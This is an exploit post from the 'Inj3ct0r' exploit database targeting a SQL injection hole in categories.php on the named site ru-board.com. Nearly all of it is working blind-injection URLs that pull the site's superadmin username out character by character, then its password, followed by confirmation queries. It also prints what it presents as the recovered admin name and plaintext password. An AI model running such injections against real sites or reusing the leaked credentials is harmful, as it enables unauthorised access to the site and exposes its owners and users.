Ru-board suffers from a remote SQL injection vulnerability.
14235426917a6c47b09d55bc9cc2916dec4f6b7ed3ba1df084b44d5e4f5d163d
=============================
Ru-board Sql inj3ct0r Exploit
=============================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
Sql Inj3ct0r Exploit:
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(substring((select+name+from+nuk e_authors+where+radminsuper=1+limit+1),1,1))=71/*
G
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(substring((select+name+from+nuk e_authors+where+radminsuper=1+limit+1),2,1))=111/*
o
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(substring((select+name+from+nuk e_authors+where+radminsuper=1+limit+1),3,1))=100/*
d
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(substring((select+name+from+nuk e_authors+where+radminsuper=1+limit+1),4,1))=0/*
user:God
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),1,1))=102/*
f
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),2,1))=114/*
r
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),3,1))=101/*
e
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),4,1))=52/*
4
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),5,1))=53/*
5
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),6,1))=116/*
t
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),7,1))=114/*
r
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),8,1))=83/*
S
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),9,1))=119/*
w
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),10,1))=51/*
3
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),11,1))=0/*
password:fre45trSw3
Reverification:
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+(select+name+from+nuke_authors+where+radminsuper=1+limit+1)=char(0x47,0x6f,0x64)/*
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+(select+pwd+from+nuke_authors+where+radminsuper=1+limit+1)=char(0x66,0x72,0x65,0x34,0x35,0x74,0x72,0x53,0x77,0x33)/*
----------------------------------------------
ThE End =] Visit my proj3ct :
http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net
# ~ - [ [ : Inj3ct0r : ] ]